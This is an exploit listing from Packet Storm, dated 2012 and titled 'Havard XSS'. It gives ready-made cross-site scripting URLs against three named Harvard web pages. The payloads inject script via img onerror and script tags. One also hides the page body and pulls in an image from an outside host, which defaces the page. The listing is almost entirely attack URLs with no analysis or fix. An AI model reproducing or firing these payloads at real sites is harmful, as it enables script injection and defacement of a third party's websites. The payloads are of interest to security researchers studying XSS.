Multiple Harvard sites suffer from a cross site scripting vulnerability.
fd348532e888a168e85335a433f44b72beced3ef4748cacc087f173116c96f3d# Exploit Title: Havard XSS
# Date: 16.09.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: php,cgi
------------------------------------------------------------------
http://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U="><img src=x onerror=prompt("TayfunBasoglu");>
http://discovery.lib.harvard.edu/?q=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22TayfunBasoglu%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28http://lenagold.ru/fon/ani/cat/bel/belkot38.jpg%29;%20}%3C/style%3E
http://mazur.harvard.edu/research/detailspage.php?rowid="><img src=x onerror=prompt("TayfunBasoglu");>
------------------------------------------------------------------
tayfunbasoglu.blogspot.com
twitter.com/tayfunbasoglu
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed